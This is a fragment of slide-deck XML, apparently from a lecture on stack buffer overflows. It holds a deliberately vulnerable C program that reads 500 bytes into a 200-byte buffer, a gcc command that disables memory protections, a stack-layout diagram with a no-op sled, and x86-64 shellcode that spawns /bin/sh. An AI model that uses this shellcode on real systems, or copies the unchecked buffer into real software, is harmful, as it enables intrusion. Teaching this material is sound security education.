                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>int main(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[], char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>enp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[200];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    puts("Enter your message:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("&gt; ");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fflush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(buf,500,stdin);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("You said: %s\n",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A7FBD35-DECA-2D1E-6CC3-2E553CF214D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4388435" y="3288798"/>
            <a:ext cx="2066956" cy="1522021"/>
            <a:chOff x="7566742" y="3523225"/>
            <a:chExt cx="1876323" cy="1425677"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle: Rounded Corners 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76EDDC4-0AD3-DC05-1620-847798735C6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7566742" y="3523225"/>
              <a:ext cx="1237227" cy="3605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A67F30-1F97-2487-6657-927D8C075BFC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7566742" y="4612966"/>
              <a:ext cx="1876323" cy="3359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E9F030A-F1B0-7C41-6AAC-58115AEB37FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046369" y="5832435"/>
            <a:ext cx="2103019"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err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bof_demo.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B63AD6F-8CE2-591C-3210-EA241F8FA327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953277" y="1901890"/>
            <a:ext cx="238606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2626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -Wall -O0 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-omit-frame-pointer -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-deprecated-declarations -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-format-security -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-stack-protector -no-pie -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bof_demo.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>​</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34962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4" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A110FEE0-EE97-0F6A-8B7C-8A4CADC5E50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1440011094"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8857779" y="2042580"/>
          <a:ext cx="2630109" cy="378513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630855">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>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53017167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630855">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Pointer to no-op sled</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32329210"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630855">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Saved EBP</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000225"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630855">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Shellcode</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5767826"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630855">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>No-op sled</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01360958"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630855">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>...</a:t>
                      </a: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535350060"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AFDBF86-703C-09B8-32B9-F2503D086D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295401" y="1832103"/>
            <a:ext cx="3620449" cy="398924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sz="2800"/>
              <a:t>Develop Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Place no-op sled on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Place Shellcode on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Align RIP (Instruction Pointer to point back to shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883196A3-4FFE-0DEA-4667-1D0D3443379C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9119728" y="1645443"/>
            <a:ext cx="210301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charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A6EEF2-00E3-8939-AD48-9A8AF56F5DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9119727" y="5826527"/>
            <a:ext cx="210301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charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D610D3FD-86C7-DA52-6EA6-820011138129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5278692" y="1855839"/>
            <a:ext cx="3263080" cy="3970318"/>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global _start
section .text
_start:
	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rsi,rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	mov rdi,0x68732f2f6e69622f
	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	push 59
	pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cdq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A402CE-13FB-A5DC-D35C-C17E3F9B7CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5782903" y="5826526"/>
            <a:ext cx="2103019"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a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152594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3" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DE2AC1-69A9-6FAC-BBFC-FFA7FFED7561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69950857"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="919975" y="3559097"/>
          <a:ext cx="10577576" cy="579120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1017548">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4104290975"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2538253">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="88160365"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2462949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
